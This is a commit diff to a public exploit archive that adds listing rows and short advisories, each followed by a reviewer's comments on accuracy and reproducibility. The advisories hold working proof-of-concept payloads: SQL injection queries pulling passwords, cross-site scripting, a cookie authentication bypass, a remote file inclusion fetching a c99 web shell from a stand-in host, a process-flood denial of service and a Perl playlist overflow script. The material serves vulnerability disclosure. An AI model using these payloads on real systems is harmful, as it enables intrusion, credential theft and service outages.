Updated 03_09_2014

Offensive Security 2014-03-09 04:29:44 +00:00
parent d21bce8f22
commit d1566a5701
14 changed files with 168 additions and 0 deletions


@ -28880,3 +28880,16 @@ id,file,description,date,author,platform,type,port
32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 votepolls.php bbPath[path] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 votepolls.php bbPath[path] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 'admin_lng' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0 32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 'admin_lng' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0
32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 'aa_login' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0
32103,platforms/php/webapps/32103.txt,"VisualPic 0.3.1 Cross-Site Scripting Vulnerability",2008-07-21,Ciph3r,php,webapps,0
32105,platforms/windows/dos/32105.pl,"PowerDVD 8.0 '.m3u' and '.pls' File Multiple Buffer Overflow Vulnerabilities",2008-07-22,LiquidWorm,windows,dos,0
32106,platforms/php/webapps/32106.txt,"Claroline 1.8 learnPath/calendar/myagenda.php Query String XSS",2008-07-22,DSecRG,php,webapps,0
32107,platforms/php/webapps/32107.txt,"Claroline 1.8 user/user.php Query String XSS",2008-07-22,DSecRG,php,webapps,0
32108,platforms/php/webapps/32108.txt,"Claroline 1.8 tracking/courseLog.php view Parameter XSS",2008-07-22,DSecRG,php,webapps,0
32109,platforms/php/webapps/32109.txt,"Claroline 1.8 tracking/toolaccess_details.php toolId Parameter XSS",2008-07-22,DSecRG,php,webapps,0
32110,platforms/multiple/remote/32110.txt,"Outpost Security Suite Pro 2009 Filename Parsing Security Bypass Vulnerability",2008-07-22,"Juan Pablo Lopez Yacubian",multiple,remote,0
32111,platforms/asp/webapps/32111.txt,"Pre Survey Generator 'default.asp' SQL Injection Vulnerability",2008-07-22,DreamTurk,asp,webapps,0
32112,platforms/linux/dos/32112.txt,"Minix 3.1.2a Psuedo Terminal Denial of Service Vulnerability",2008-07-23,kokanin,linux,dos,0
32113,platforms/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 'username' Parameter SQL Injection Vulnerability",2008-07-23,"Lars Heidelberg",php,webapps,0
32114,platforms/php/webapps/32114.txt,"AtomPhotoBlog 1.15 'atomPhotoBlog.php' SQL Injection Vulnerability",2008-07-24,Mr.SQL,php,webapps,0
32116,platforms/php/webapps/32116.txt,"ezContents 'minicalendar.php' Remote File Include Vulnerability",2008-07-25,"HACKERS PAL",php,webapps,0
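Review bot: the 32112 description in this hunk reads "Psuedo Terminal"; the spelling is "Pseudo Terminal" and it is worth correcting before the row lands, since the csv is the listing readers search. Two consistency points in the same hunk: the 32114 row gives the AtomPhotoBlog version as 1.15 while the 32114.txt added in this commit says 1.15b1, and 32112 is filed under platform "linux" although the advisory is for Minix, which is not Linux; "multiple", the value this hunk already uses for 32110, would be less misleading. The id sequence also skips 32104 and 32115 with no matching files in the commit; if those were rejected or deferred, a line in the commit message saying so would save the next person a lookup.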



@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30349/info
Pre Survey Generator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/poll/default.asp?catid=1+union+select+0,password+from+users
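Review bot: this file has no affected-version line, unlike the other advisories added in this commit (compare "AlphAdmin CMS 1.0.5_03 is vulnerable; other versions may also be affected."), and the csv row for 32111 carries no version either, so a reader cannot tell which Pre Survey Generator release BID 30349 covers. The PoC also silently assumes a two-column SELECT (the "0,password" pair) and a table named "users"; a one-line note that the column count and table name came from the tested install would tell readers which parts to adjust and which part is the bug.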

platforms/linux/dos/32112.txt Executable file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/30357/info
Minix is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to prevent users from opening new pseudo terminals, denying service to legitimate users.
Minix 3.1.2a is vulnerable; other versions may also be affected.
$ uname -a
Minix 192.168.1.2 3 1.2a i686
$ while true ; do (yes "yes yes minix uh ah"&) ; done
[snip snip]
$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C
...disconnected
telnet 192.168.1.2
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
I am sorry, but there is no free PTY left!
Connection closed by foreign host.
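Review bot: the PoC on the "while true" line is an unbounded background-process loop, not something that allocates pseudo terminals directly, and the file never says why a flood of "yes" processes ends with telnetd answering "no free PTY left"; one sentence on the mechanism (process table, PTY table, or whatever was actually exhausted) would turn the pasted session into a verifiable advisory. The precondition should also be stated: the attacker already has an interactive shell on the host (the "$" prompt), so this is a local resource-exhaustion DoS, not something reachable from the telnet side. Finally, the loop has no exit and the run of ^C shows the originating session itself stopped responding, so testers should expect to lose their own login when they try this.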


@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/30347/info
Outpost Security Suite Pro is prone to a vulnerability that allows an unauthorized attacker to bypass antivirus and firewall rules. This issue occurs because the application fails to adequately sanitize user-supplied input.
Successful exploits can allow malicious data to evade expected detection rules, giving legitimate users a false sense of security. Other attacks may also be possible.
Outpost Security Suite Pro 2009 is vulnerable; other versions may also be affected.
ASCII: 
HEX: 26 23 31 32 32 38 38 3b
The following special character in a filename can evade firewall rules:
ASCII:? ? ? ‣ ․ ‥ ?
HEX: 86 20 87 20 95 20 26 23 38 32 32 37 3b 20 26 23 38 32 32 38 3b 20
26 23 38 32 32 39 3b 20 85
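Review bot: the two ASCII lines in this hunk are unusable as stored: the first is empty and the second shows question marks, because the characters involved are not ASCII and were lost on the way in, so the HEX lines are the only reliable record. Those HEX lines in turn mix two representations. "26 23 31 32 32 38 38 3b" is the eight-byte text "&#12288;", an HTML numeric character reference for U+3000 (ideographic space), and the groups "26 23 38 32 32 37 3b", "26 23 38 32 32 38 3b" and "26 23 38 32 32 39 3b" are likewise the literal text of the references for U+2023, U+2024 and U+2025, while 86, 87, 95 and 85 are single bytes that only mean something in a code page such as Windows-1252. A reader therefore cannot tell whether the filename that evaded the rules contained the entity text or the characters themselves. The file should give each character as a code point plus the exact bytes written to disk, and say which encoding the test filename was created in.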


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30333/info
AlphAdmin CMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
AlphAdmin CMS 1.0.5_03 is vulnerable; other versions may also be affected.
javascript:document.cookie = "aa_login=1; path=/";
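Review bot: the one-line PoC omits its precondition: a javascript: URL sets document.cookie for the origin of the page currently loaded, so it only works while the browser is already on the vulnerable AlphAdmin host; typed into a blank tab it sets the cookie for the wrong site or not at all. The file should also say what to request after setting aa_login=1, since the description promises administrative access but the PoC stops at the cookie. A browser-independent form of the same test is to send the header directly, that is, a request to the admin page carrying "Cookie: aa_login=1".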

platforms/php/webapps/32103.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/30334/info
VisualPic is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
VisualPic 0.3.1 is vulnerable; other versions may be affected as well.
http://www.example.com/visualpic/?login&pic=>"><script>alert("XSS")</script>
http://www.example.com/visualpic/?pic=%00'"><script>alert("XSS")</script>
http://www.example.com/visualpic/?login&pic=>"><script>alert("XSS")</script>
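Review bot: the third PoC URL is a byte-for-byte duplicate of the first, so the file advertises three vectors but documents two; either drop the repeat or, if a distinct third entry point was intended, it is missing. The second URL prefixes the payload with %00 and nothing in the file says why; if the null byte is what gets past a check on the pic value, that is the interesting part of the finding and deserves a sentence. The payloads are also not URL-encoded (the "><script> sequence contains characters that browsers and servers handle differently), so the exact request that was tested is ambiguous.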

platforms/php/webapps/32106.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30346/info
Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Claroline 1.8.11 are vulnerable.
http://www.example.com/[installdir]/claroline/calendar/myagenda.php?"><script>alert(&#039;DSecRG
XSS&#039;)</script>
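Review bot: the PoC URL is broken across two lines (the break falls between "DSecRG" and "XSS") and contains "&#039;" where the payload had a plain apostrophe; both are artifacts of copying from an HTML page, and anyone pasting this sends a literal ampersand-hash sequence and a stray newline instead of alert('DSecRG XSS'). The file should carry the single-line form with the quote as ' or %27. It is also worth one sentence that the page reflects the raw query string (there is no parameter name in front of the payload), which is what the "Query String XSS" title in the csv means; otherwise the URL looks like it is missing a parameter.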

platforms/php/webapps/32107.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30346/info
Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Claroline 1.8.11 are vulnerable.
http://www.example.com/[installdir]/claroline/user/user.php?"><script>alert(&#039;DSecRG
XSS&#039;)</script>
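Review bot: the same two import artifacts as the other Claroline files in this commit: the URL is wrapped mid-payload after "DSecRG" and the apostrophes appear as the entity "&#039;" instead of ' (or %27). As stored the PoC does not reproduce; it should be a single line with real quotes.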

platforms/php/webapps/32108.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30346/info
Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Claroline 1.8.11 are vulnerable.
http://www.example.com/[installdir]/claroline/tracking/courseLog.php?view=DSec"
STYLE="xss:expression(alert(&#039;DSecRG XSS&#039;))
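Review bot: besides the wrapped URL and the "&#039;" entities this PoC shares with the other Claroline files in the commit, the payload itself is browser-specific: STYLE="xss:expression(...)" relies on CSS expression(), which only Internet Explorer ever evaluated. The file should say the vector was confirmed in IE and that the underlying bug is unescaped output of the view parameter inside an HTML attribute, not anything particular to expression(); closing the attribute with a double quote and using an ordinary event handler shows the same flaw in any browser. As written, a tester on another browser sees nothing and may wrongly close the finding.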

platforms/php/webapps/32109.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30346/info
Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Claroline 1.8.11 are vulnerable.
http://www.example.com/[installdir]/claroline/tracking/toolaccess_details.php?toolId="><script>alert(&#039;DSecRG
XSS&#039;)</script>
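Review bot: the toolId payload is wrapped across two lines and uses the "&#039;" entity for the apostrophe, the same import artifact as the other Claroline entries in this commit; it needs to be one line with ' or %27 before it can be pasted as-is.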

platforms/php/webapps/32113.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30358/info
EMC Centera Universal Access (CUA) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CUA 4.0_4735.p4 is vulnerable; other versions may also be affected.
Username: valid_user_name
Password: --
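Review bot: the PoC as stored is two field values, and "--" only makes sense once the reader knows it is the SQL comment sequence that truncates whatever follows the password in the login query; the file should say so, and ideally show the shape of the resulting query, because a password of "--" that is hashed before comparison would do nothing. The username precondition is also understated: "valid_user_name" means the attacker must already know an existing account name, so this is a bypass against a known account rather than a fully unauthenticated one. Without that context the file cannot be reproduced or triaged on its own.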


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30360/info
AtomPhotoBlog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AtomPhotoBlog 1.15b1 is vulnerable; other versions may also be affected.
http://www.example.com/atomPhotoBlog.php?do=show&photoId=969696+union+select+0,0,0,0,0,0,0,0,0,0,0,mail,pass,0+from+user
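Review bot: the version line says AtomPhotoBlog 1.15b1 while the csv row added for 32114 in this same commit says 1.15; one of the two should change so listing and file agree. The PoC also hard-codes a 14-column UNION with mail and pass in positions 12 and 13 and a table named "user"; a note that these came from the tested schema, and that the large photoId value is presumably there so the original query matches nothing and the UNION row is what gets rendered, would tell readers which parts to adapt.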


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30373/info
ezContents CMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=http://www.example2.com/soqor10/c99.txt?
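Review bot: this advisory has no affected-version line (every other file in the commit except 32111 carries one), and the PoC depends on two PHP settings it never names: a GLOBALS[...] key in the query string only overwrites script variables when register_globals is on, and including an http:// URL only executes when allow_url_include (allow_url_fopen on PHP before 5.2) is enabled. Both should be stated as preconditions, since on PHP 5.2 and later both default to off and the request is then harmless. The "GLOBALS[rootdp]=./" part also deserves a word; it presumably sets the base directory used to build the include path, and readers will otherwise drop it as noise.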

platforms/windows/dos/32105.pl Executable file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/30341/info
PowerDVD is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.
PowerDVD 8.0 is vulnerable; prior versions may also be affected.
#!/usr/bin/perl
#
# CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit
# Coded by Gjoko "LiquidWorm" Krstic
# liquidworm [At] gmail.com
# http://www.zeroscience.org
#
$buffer = "J" x 520000;
open(m3u, ">./evil_list.m3u"); # or .pls
print m3u "$buffer";
print "\n--> Evil Playlist created... Have fun!\n";
# July, 2008
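Review bot: the open() on the evil_list.m3u line checks nothing, so if the current directory is not writable the script still prints "Evil Playlist created" and the tester is left with no file and no error; it should be "open(my $fh, '>', 'evil_list.m3u') or die "open: $!";" with a matching close($fh) so the 520000 bytes are flushed before the success message. It should also carry "use strict;" and "use warnings;" like any script meant to be re-run, and the bareword filehandle m3u and the needlessly quoted "$buffer" are style points worth cleaning up at the same time. Two documentation points: the comment "# or .pls" is the only trace of the PLS vector the csv title claims, so the script should either take the extension as an argument or write both files; and the advisory text speaks of arbitrary code execution while the csv files this as dos and the script only crashes the player, which should be said plainly so nobody expects a shell from 520000 copies of "J".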